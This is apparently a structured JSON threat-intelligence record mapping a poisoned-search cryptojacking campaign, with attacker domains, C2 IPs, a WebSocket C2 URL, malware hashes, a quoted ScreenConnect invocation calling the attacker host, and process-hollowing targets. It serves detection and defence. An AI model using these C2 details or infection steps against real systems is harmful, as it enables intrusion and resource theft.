{
  "iim_version": "1.1",
  "chain_id": "microsoft.2026.poisoned-search-screenconnect-gpu-miner",
  "title": "Poisoned search and AI-assisted fake utility downloads to ScreenConnect and GPU-miner C2",
  "description": "IIM chain for the Microsoft-described cryptojacking campaign published on 2026-05-26. The operation uses search-engine poisoning and observed AI-chatbot referral contexts to send users looking for trusted GPU/system utilities to attacker-controlled lookalike download sites. Those sites deliver ZIP archives from Dynu-backed gleeze/giize Dynamic DNS subdomains. The archive contains a legitimate utility executable and malicious autorun.dll variants. The DLL silently installs a ScreenConnect payload masquerading as vcredist_x64.dll, establishing persistent RMM access to directdownload.icu / 193.42.11.108. After the ScreenConnect session is established, the operator transfers SimpleRunPE.exe, which installs RuntimeHost.exe, hollows Microsoft-signed .NET utilities, and connects to the encrypted WebSocket C2 wss://minemine.gleeze.com:8443/ws with hardcoded TLS certificate pinning. The same certificate was observed on three additional IPs Microsoft assesses as part of the C2 infrastructure. The hollowed loader later downloads GPU-focused mining tools at runtime.",
  "actor_id": "unknown",
  "observed_at": "2026-05-26T00:00:00Z",
  "confidence": "confirmed",
  "needs_review": false,
  "import_source": "manual-osint-report-to-iim-conversion",
  "entities": [
    {
      "id": "e001",
      "type": "domain",
      "value": "attacker-controlled lookalike utility download domains (>150 domains; exact landing domains not published)",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the campaign begins when users search for common system utility and hardware-monitoring software and are directed to attacker-controlled lookalike sites through manipulated results.",
        "The campaign impersonates CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear.",
        "Microsoft states that since March 2026 it identified more than 150 malicious domains serving these masqueraded tools.",
        "Microsoft also observed reports and VirusTotal metadata indicating that some malicious domains were surfaced through LLM-based tool recommendations; Microsoft describes this as observed/correlated, not a systemic issue with any specific AI service."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_exact_iocs_published": false,
      "x_modeling_note": "This entity models the report-confirmed landing-domain set. The exact landing domains were not published by Microsoft."
    },
    {
      "id": "e002",
      "type": "domain",
      "value": "direct-download.gleeze.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists direct-download[.]gleeze[.]com as a domain that hosts malicious ZIP files.",
        "Microsoft states that each fake site retrieves a ZIP archive hosted on a campaign-specific subdomain of gleeze.com.",
        "Microsoft states the gleeze.com parent domain is hosted by infrastructure associated with Dynu, a dynamic DNS provider."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "direct-download[.]gleeze[.]com"
    },
    {
      "id": "e003",
      "type": "domain",
      "value": "start-download.gleeze.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists start-download[.]gleeze[.]com as a domain that hosts malicious ZIP files.",
        "Microsoft ties campaign ZIP retrieval to gleeze.com subdomains and identifies gleeze.com as Dynu-associated Dynamic DNS infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "start-download[.]gleeze[.]com"
    },
    {
      "id": "e004",
      "type": "domain",
      "value": "direct-downloads.giize.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists direct-downloads[.]giize.com as a domain that hosts malicious ZIP files.",
        "Microsoft states that additional linked campaigns used similar DynamicDNS domain giize[.]com and led to the same infection chain described in the blog."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "direct-downloads[.]giize.com",
      "x_scope": "linked sibling staging infrastructure leading to the same infection chain"
    },
    {
      "id": "e005",
      "type": "domain",
      "value": "free-download.giize.com",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft IOC table lists free-download[.]giize.com as a domain that hosts malicious ZIP files.",
        "Microsoft states that giize[.]com sources were linked to similar SEO poisoning campaigns leading to the same infection chain."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "free-download[.]giize.com",
      "x_scope": "linked sibling staging infrastructure leading to the same infection chain"
    },
    {
      "id": "e006",
      "type": "file",
      "value": "malicious ZIP archive containing legitimate utility executable plus autorun.dll",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states each fake site presents a download button that retrieves a ZIP archive from a campaign-specific gleeze.com subdomain.",
        "Microsoft states the downloaded ZIP archive contains the legitimate executable for the spoofed utility alongside a malicious DLL named autorun.dll.",
        "Microsoft IOC table describes the gleeze/giize domains as hosts for malicious ZIP files."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/"
    },
    {
      "id": "e007",
      "type": "file",
      "value": "autorun.dll variant set loaded by legitimate utility executable",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the legitimate utility executable loads autorun.dll from the same folder via DLL sideloading.",
        "Microsoft states analysis revealed nine distinct autorun.dll variants across the campaign.",
        "Microsoft IOC table lists nine SHA-256 values for autorun.dll loaded by a legitimate executable via DLL sideloading.",
        "SHA256 autorun.dll: 16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c",
        "SHA256 autorun.dll: 1b2555b09ac62164638f47c8272beb6b0f97186e37d3a54cb84c723ff7a2eee5",
        "SHA256 autorun.dll: 062bb28765fbaa11f8cc341fa16e2c7f942a122d929cb41f4a0f755b4429f246",
        "SHA256 autorun.dll: c7425fbe6c3a4937934215c54027d4b67202d12ab490682fae03498870d66d06",
        "SHA256 autorun.dll: a460d00ef93c8ce70d32e48e55781af66a53328fc2dde45519be196c265de074",
        "SHA256 autorun.dll: db2d33c4e6e4a5c2263b56e8303c343305a94dde1fc2968304ba260acbbd9f9f",
        "SHA256 autorun.dll: cf3f8160eb5a5580e0c35054847e3ac4d01e9fe74fab8bc12bf6e8a40bf696b2",
        "SHA256 autorun.dll: 69077fcf940fc5852fb32beed15636756ebc04ac971b7ed71d36251e7ea70a20",
        "SHA256 autorun.dll: 2ee93ccbcd49ed94c65dcf52e7dcb8f0fa0a443ca24c0e0c7f79152efba657b7"
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_hashes_sha256": [
        "16562974deec80e41ef57a71a6de8c03ceb393005fb1432f8d9d82c61294ef8c",
        "1b2555b09ac62164638f47c8272beb6b0f97186e37d3a54cb84c723ff7a2eee5",
        "062bb28765fbaa11f8cc341fa16e2c7f942a122d929cb41f4a0f755b4429f246",
        "c7425fbe6c3a4937934215c54027d4b67202d12ab490682fae03498870d66d06",
        "a460d00ef93c8ce70d32e48e55781af66a53328fc2dde45519be196c265de074",
        "db2d33c4e6e4a5c2263b56e8303c343305a94dde1fc2968304ba260acbbd9f9f",
        "cf3f8160eb5a5580e0c35054847e3ac4d01e9fe74fab8bc12bf6e8a40bf696b2",
        "69077fcf940fc5852fb32beed15636756ebc04ac971b7ed71d36251e7ea70a20",
        "2ee93ccbcd49ed94c65dcf52e7dcb8f0fa0a443ca24c0e0c7f79152efba657b7"
      ]
    },
    {
      "id": "e008",
      "type": "hash",
      "value": "e021662a652ba95c8778b991056696ab3c9b0f60d5e23b1e6cf73c3847db6610",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states autorun.dll uses msiexec.exe to silently install vcredist_x64.dll, which masquerades as the Visual C++ Redistributable.",
        "Microsoft states vcredist_x64.dll is itself a packaged installer for ScreenConnect software.",
        "Microsoft IOC table lists this SHA-256 as a ScreenConnect file masquerading as a DLL."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_filename": "vcredist_x64.dll",
      "x_description": "ScreenConnect file masquerading as a DLL"
    },
    {
      "id": "e009",
      "type": "file",
      "value": "ScreenConnect.ClientService.exe service invocation",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states that once installed, the ScreenConnect client constantly attempts to communicate with the attacker-controlled server at 193.42.11[.]108.",
        "Microsoft publishes the ScreenConnect service invocation containing h=directdownload.icu and p=8041.",
        "Microsoft states the h parameter directdownload[.]icu is the host the client connects to."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_command_excerpt": "ScreenConnect.ClientService.exe ?e=Access&y=Guest&h=directdownload.icu&p=8041&s=b31c5795-9b66-4d20-ac8d-aad60d05852a&k=..."
    },
    {
      "id": "e010",
      "type": "domain",
      "value": "directdownload.icu",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the ScreenConnect h parameter directdownload[.]icu is the host the client connects to.",
        "Microsoft IOC table lists directdownload[.]icu as the domain host that the ScreenConnect client connects to."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "directdownload[.]icu"
    },
    {
      "id": "e011",
      "type": "ip",
      "value": "193.42.11.108",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the ScreenConnect client constantly attempts to communicate with the attacker-controlled server at 193.42.11[.]108.",
        "Microsoft IOC table lists 193.42.11[.]108 as the IP address the ScreenConnect client communicates to."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "193.42.11[.]108"
    },
    {
      "id": "e012",
      "type": "file",
      "value": "SimpleRunPE.exe variant set transferred through ScreenConnect file-transfer",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states that once the ScreenConnect session is established, the attacker drops SimpleRunPE.exe directly via ScreenConnect file-transfer.",
        "Microsoft IOC table lists two SHA-256 values for SimpleRunPE.exe transferred by the attacker during the established ScreenConnect session.",
        "Microsoft reports a PDB path matching a Simple-RunPE-Process-Hollowing RUNPE-style codebase, but assesses the fork lineage only with moderate confidence.",
        "SHA256 SimpleRunPE.exe: 9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386",
        "SHA256 SimpleRunPE.exe: 7035c2abeb617e828dfda1b119b8544fa9ae15a1d263d18bc5506acaf381f496"
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_hashes_sha256": [
        "9ff07c9fafa9c03fdf69e4abf6806aa7c938b5480e7e258f227db0719ecd6386",
        "7035c2abeb617e828dfda1b119b8544fa9ae15a1d263d18bc5506acaf381f496"
      ],
      "x_pdb_path": "G:\\My Drive\\works\\test projects\\Simple-RunPE-Process-Hollowing-RUNPE\\SimpleRunPE\\obj\\Release\\SimpleRunPE.pdb",
      "x_lineage_confidence": "moderate"
    },
    {
      "id": "e013",
      "type": "file",
      "value": "%LocalAppData%\\Microsoft\\Windows\\Caches\\D3F4E2A1\\RuntimeHost.exe",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states SimpleRunPE.exe writes a copy of itself into a hidden install folder as RuntimeHost.exe.",
        "Microsoft states the fallback install path is %LocalAppData%\\Microsoft\\Windows\\Caches\\D3F4E2A1\\.",
        "Microsoft hunting content searches for RuntimeHost.exe executions from paths containing \\Caches\\D3F4E2A1."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_mutex": "Global\\D3F4E2A1_Svc"
    },
    {
      "id": "e014",
      "type": "file",
      "value": "Microsoft-signed .NET Framework hollowing target set",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states SimpleRunPE.exe attempts process hollowing into a legitimate Microsoft-signed binary.",
        "Microsoft lists seven candidate .NET Framework utilities: InstallUtil.exe, RegAsm.exe, RegSvcs.exe, MSBuild.exe, AppLaunch.exe, AddInProcess.exe, and aspnet_compiler.exe.",
        "Microsoft states the dropper launches the chosen target suspended and uses WriteProcessMemory, SetThreadContext, and ResumeThread so malicious mining code runs under a trusted Microsoft-signed binary."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_targets": [
        "InstallUtil.exe",
        "RegAsm.exe",
        "RegSvcs.exe",
        "MSBuild.exe",
        "AppLaunch.exe",
        "AddInProcess.exe",
        "aspnet_compiler.exe"
      ]
    },
    {
      "id": "e015",
      "type": "url",
      "value": "wss://minemine.gleeze.com:8443/ws",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the attacker server address is stored in an AES-128-CBC encrypted blob.",
        "Microsoft states decrypting the embedded blob yields the C2 URL wss[:]//minemine.gleeze[.]com:8443/ws.",
        "Microsoft IOC table lists wss[:]//minemine.gleeze[.]com:8443/ws as the C2 URL from the hollowed binary."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "wss[:]//minemine.gleeze[.]com:8443/ws"
    },
    {
      "id": "e016",
      "type": "certificate",
      "value": "EB:C3:5D:4A:08:D9:3A:88:0E:90:AE:AD:2D:3F:7F:B4:3F:DC:08:EA:77:DB:9D:D5:2F:80:78:1E:6B:FD:88:67",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the malware hardcodes the SHA-256 fingerprint of the TLS certificate expected at the endpoint for certificate pinning during the WebSocket handshake.",
        "Microsoft states OSINT observed this TLS certificate being presented by three IP addresses and Microsoft assesses those IPs as part of C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_usage": "TLS certificate pinning for WebSocket C2"
    },
    {
      "id": "e017",
      "type": "ip",
      "value": "93.115.10.35",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states OSINT observed the hard-coded TLS certificate being presented by 93.115[.]10.35.",
        "Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "93.115[.]10.35"
    },
    {
      "id": "e018",
      "type": "ip",
      "value": "198.23.185.238",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states OSINT observed the hard-coded TLS certificate being presented by 198.23[.]185.238.",
        "Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "198.23[.]185.238"
    },
    {
      "id": "e019",
      "type": "ip",
      "value": "2.59.132.106",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states OSINT observed the hard-coded TLS certificate being presented by 2.59.132[.]106.",
        "Microsoft assesses the IPs presenting this certificate as part of the C2 infrastructure."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_defanged": "2.59.132[.]106"
    },
    {
      "id": "e020",
      "type": "file",
      "value": "runtime-selected GPU miner archive / miner tool set: gminer, lolMiner, SRBMiner-MULTI",
      "observed_at": "2026-05-26T00:00:00Z",
      "source": "Microsoft Security Blog: From poisoned search results to GPU mining (2026-05-26)",
      "evidence": [
        "Microsoft states the hollowed Windows binary does not embed a miner program.",
        "Microsoft states that when it is time to begin mining, the malware downloads the appropriate miner archive at runtime and runs it.",
        "Microsoft states three GPU-focused miner programs are supported: gminer, lolMiner, and SRBMiner-MULTI.",
        "Microsoft did not publish the runtime miner archive URL in the article."
      ],
      "x_reference_url": "https://www.microsoft.com/en-us/security/blog/2026/05/26/poisoned-search-results-gpu-mining-cryptojacking-campaign-abusing-screenconnect-microsoft-net-utilities/",
      "x_exact_download_url_published": false
    }
  ],
  "chain": [
    {
      "entity_id": "e001",
      "role": "entry",
      "techniques": [
        "IIM-T011"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "likely",
      "review_notes": "Exact landing domains were not published, but Microsoft confirms more than 150 malicious masquerading domains and a broad portfolio of fake utility brands."
    },
    {
      "entity_id": "e002",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e003",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e004",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "likely",
      "technique_confidence": "confirmed",
      "review_notes": "Microsoft lists this giize.com domain as malicious ZIP hosting in linked campaigns leading to the same infection chain."
    },
    {
      "entity_id": "e005",
      "role": "staging",
      "techniques": [
        "IIM-T008",
        "IIM-T024"
      ],
      "role_confidence": "likely",
      "technique_confidence": "confirmed",
      "review_notes": "Microsoft lists this giize.com domain as malicious ZIP hosting in linked campaigns leading to the same infection chain."
    },
    {
      "entity_id": "e006",
      "role": "staging",
      "techniques": [
        "IIM-T024"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e007",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e008",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e009",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e010",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e011",
      "role": "c2",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e012",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e013",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e014",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    },
    {
      "entity_id": "e015",
      "role": "c2",
      "techniques": [
        "IIM-T008",
        "IIM-T021"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "review_notes": "C2 uses a gleeze.com Dynamic DNS hostname. Certificate pinning is modeled as request/connection fingerprint gating because the C2 session is accepted only when the pinned TLS fingerprint matches the embedded expectation."
    },
    {
      "entity_id": "e016",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e017",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e018",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e019",
      "role": "c2",
      "techniques": [
        "IIM-T012"
      ],
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed"
    },
    {
      "entity_id": "e020",
      "role": "payload",
      "techniques": [],
      "role_confidence": "confirmed"
    }
  ],
  "relations": [
    {
      "from": "e001",
      "to": "e002",
      "type": "download",
      "sequence_order": 1,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Fake-site download buttons retrieve ZIP archives from campaign-specific gleeze.com subdomains."
      ]
    },
    {
      "from": "e001",
      "to": "e003",
      "type": "download",
      "sequence_order": 2,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft IOC table lists start-download.gleeze.com as malicious ZIP hosting in this campaign."
      ]
    },
    {
      "from": "e001",
      "to": "e004",
      "type": "download",
      "sequence_order": 3,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "Microsoft lists direct-downloads.giize.com as ZIP hosting in additional linked DynamicDNS campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e001",
      "to": "e005",
      "type": "download",
      "sequence_order": 4,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "Microsoft lists free-download.giize.com as ZIP hosting in additional linked DynamicDNS campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e002",
      "to": "e006",
      "type": "download",
      "sequence_order": 5,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "direct-download.gleeze.com is listed as a domain that hosts malicious ZIP files."
      ]
    },
    {
      "from": "e003",
      "to": "e006",
      "type": "download",
      "sequence_order": 6,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "start-download.gleeze.com is listed as a domain that hosts malicious ZIP files."
      ]
    },
    {
      "from": "e004",
      "to": "e006",
      "type": "download",
      "sequence_order": 7,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "direct-downloads.giize.com is listed as ZIP hosting in linked similar campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e005",
      "to": "e006",
      "type": "download",
      "sequence_order": 8,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "free-download.giize.com is listed as ZIP hosting in linked similar campaigns leading to the same infection chain."
      ]
    },
    {
      "from": "e006",
      "to": "e007",
      "type": "drops",
      "sequence_order": 9,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The ZIP contains a legitimate utility executable alongside malicious autorun.dll."
      ]
    },
    {
      "from": "e007",
      "to": "e008",
      "type": "drops",
      "sequence_order": 10,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "autorun.dll uses msiexec.exe to silently install vcredist_x64.dll, a packaged ScreenConnect installer."
      ]
    },
    {
      "from": "e008",
      "to": "e009",
      "type": "execute",
      "sequence_order": 11,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The installed ScreenConnect package produces a ScreenConnect client service invocation."
      ]
    },
    {
      "from": "e009",
      "to": "e010",
      "type": "connect",
      "sequence_order": 12,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The service invocation contains h=directdownload.icu; Microsoft states this is the host the client connects to."
      ]
    },
    {
      "from": "e009",
      "to": "e011",
      "type": "connect",
      "sequence_order": 13,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft states the ScreenConnect client communicates with attacker-controlled server 193.42.11.108."
      ]
    },
    {
      "from": "e010",
      "to": "e011",
      "type": "resolves-to",
      "sequence_order": 14,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "likely",
      "x_evidence": [
        "The service invocation host is directdownload.icu and the same installed ScreenConnect client is stated to communicate with 193.42.11.108. Microsoft does not explicitly publish DNS resolution records; modeled as likely."
      ]
    },
    {
      "from": "e011",
      "to": "e012",
      "type": "drops",
      "sequence_order": 15,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "After the ScreenConnect session is established, the attacker drops SimpleRunPE.exe through ScreenConnect file-transfer."
      ]
    },
    {
      "from": "e012",
      "to": "e013",
      "type": "drops",
      "sequence_order": 16,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "SimpleRunPE.exe writes a hidden copy of itself as RuntimeHost.exe."
      ]
    },
    {
      "from": "e013",
      "to": "e014",
      "type": "execute",
      "sequence_order": 17,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "RuntimeHost.exe relaunches/hollows a legitimate Microsoft-signed .NET utility target."
      ]
    },
    {
      "from": "e014",
      "to": "e015",
      "type": "connect",
      "sequence_order": 18,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft states decrypting the embedded blob yields the WebSocket C2 URL used by the hollowed binary."
      ]
    },
    {
      "from": "e014",
      "to": "e016",
      "type": "references",
      "sequence_order": 19,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "The malware hardcodes the SHA-256 fingerprint of the TLS certificate expected at the endpoint for pinning."
      ]
    },
    {
      "from": "e016",
      "to": "e017",
      "type": "references",
      "sequence_order": 20,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_relation_semantics": "certificate-observed-on-ip",
      "x_evidence": [
        "Microsoft states the hard-coded certificate was observed on 93.115.10.35 and assesses the IP as C2 infrastructure."
      ]
    },
    {
      "from": "e016",
      "to": "e018",
      "type": "references",
      "sequence_order": 21,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_relation_semantics": "certificate-observed-on-ip",
      "x_evidence": [
        "Microsoft states the hard-coded certificate was observed on 198.23.185.238 and assesses the IP as C2 infrastructure."
      ]
    },
    {
      "from": "e016",
      "to": "e019",
      "type": "references",
      "sequence_order": 22,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_relation_semantics": "certificate-observed-on-ip",
      "x_evidence": [
        "Microsoft states the hard-coded certificate was observed on 2.59.132.106 and assesses the IP as C2 infrastructure."
      ]
    },
    {
      "from": "e014",
      "to": "e020",
      "type": "download",
      "sequence_order": 23,
      "observed_at": "2026-05-26T00:00:00Z",
      "confidence": "confirmed",
      "x_evidence": [
        "Microsoft states the hollowed binary downloads the appropriate miner archive at runtime and runs it. The exact archive URL was not published."
      ]
    }
  ],
  "attack_annotations": [
    {
      "technique_id": "T1189",
      "name": "Drive-by Compromise",
      "tactic": "Initial Access",
      "comment": "Users searching for utilities are directed to attacker-controlled lookalike download sites through poisoned search results."
    },
    {
      "technique_id": "T1105",
      "name": "Ingress Tool Transfer",
      "tactic": "Command and Control",
      "comment": "ZIP payloads, SimpleRunPE.exe, and runtime miner archives are transferred into the environment."
    },
    {
      "technique_id": "T1574.002",
      "name": "Hijack Execution Flow: DLL Side-Loading",
      "tactic": "Persistence/Privilege Escalation/Defense Evasion",
      "comment": "Legitimate utility executable loads autorun.dll from the same folder."
    },
    {
      "technique_id": "T1219",
      "name": "Remote Access Software",
      "tactic": "Command and Control",
      "comment": "ScreenConnect is abused to establish persistent remote access."
    },
    {
      "technique_id": "T1055.012",
      "name": "Process Injection: Process Hollowing",
      "tactic": "Defense Evasion/Privilege Escalation",
      "comment": "SimpleRunPE/RuntimeHost hollow Microsoft-signed .NET utilities."
    },
    {
      "technique_id": "T1496",
      "name": "Resource Hijacking",
      "tactic": "Impact",
      "comment": "The campaign downloads and runs GPU-focused mining tools."
    }
  ],
  "x_source": {
